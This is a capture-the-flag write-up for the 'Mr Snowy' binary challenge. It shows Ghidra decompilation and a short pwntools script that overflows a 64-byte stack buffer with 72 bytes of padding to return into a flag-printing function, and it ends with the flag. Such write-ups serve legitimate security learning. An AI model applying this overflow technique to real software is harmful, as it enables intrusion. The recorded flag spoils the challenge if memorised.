Skip to main content

Day 1: Mr Snowy

challenge description
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. 
But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
Something must be wrong with him.

Poking around

To be honest, I hate all the colour syntax highlighting introduced. It makes pwntools work poorly when receiving bytes and sending payload. (At least on day 4, there is no more colours).

Firstly, let's see what Ghidra says.

void snowman(void)

{
int iVar1;
char local_48 [64];

printstr(&DAT_004019a8);
fflush(stdout);
read(0,local_48,2);
iVar1 = atoi(local_48);
if (iVar1 != 1) {
printstr("[*] It\'s just a cute snowman after all, nothing to worry about..\n");
color("\n[-] Mission failed!\n",&DAT_0040161a,&DAT_00401664);
/* WARNING: Subroutine does not return */
exit(-0x45);
}
investigate();
return;
}

Seems like a classic Stack Buffer overflow. Seems like we have to deactivate something... Luckily there is a convenient function.

deactivate_camera
void deactivate_camera(void)

{
char acStack104 [48];
FILE *local_38;
char *local_30;
undefined8 local_28;
int local_1c;

local_1c = 0x30;
local_28 = 0x2f;
local_30 = acStack104;
local_38 = fopen("flag.txt","rb");
if (local_38 == (FILE *)0x0) {
fwrite("[-] Could not open flag.txt, please conctact an Administrator.\n",1,0x3f,stdout);
/* WARNING: Subroutine does not return */
exit(-0x45);
}
fgets(local_30,local_1c,local_38);
puts("\x1b[1;32m");
fwrite("[+] Here is the secret password to deactivate the camera: ",1,0x3a,stdout);
puts(local_30);
fclose(local_38);
return;
}

Crafting out script:

from pwn import *

binary = context.binary = ELF("./mr_snowy")
deactivate = binary.sym.deactivate_camera

if args.REMOTE:
p = remote('209.97.137.85', 32568)
else:
p = process("./mr_snowy")
gdb.attach(p,
'''
b *investigate+244
c
''')

p.recvuntil(b">")
p.sendline(b"1")

p.recvuntil(b">")

payload = b"A" * 72
payload += p64(deactivate)

p.send(payload)
p.interactive()

Flag

Flag: HTB{n1c3_try_3lv35_but_n0t_g00d_3n0ugh}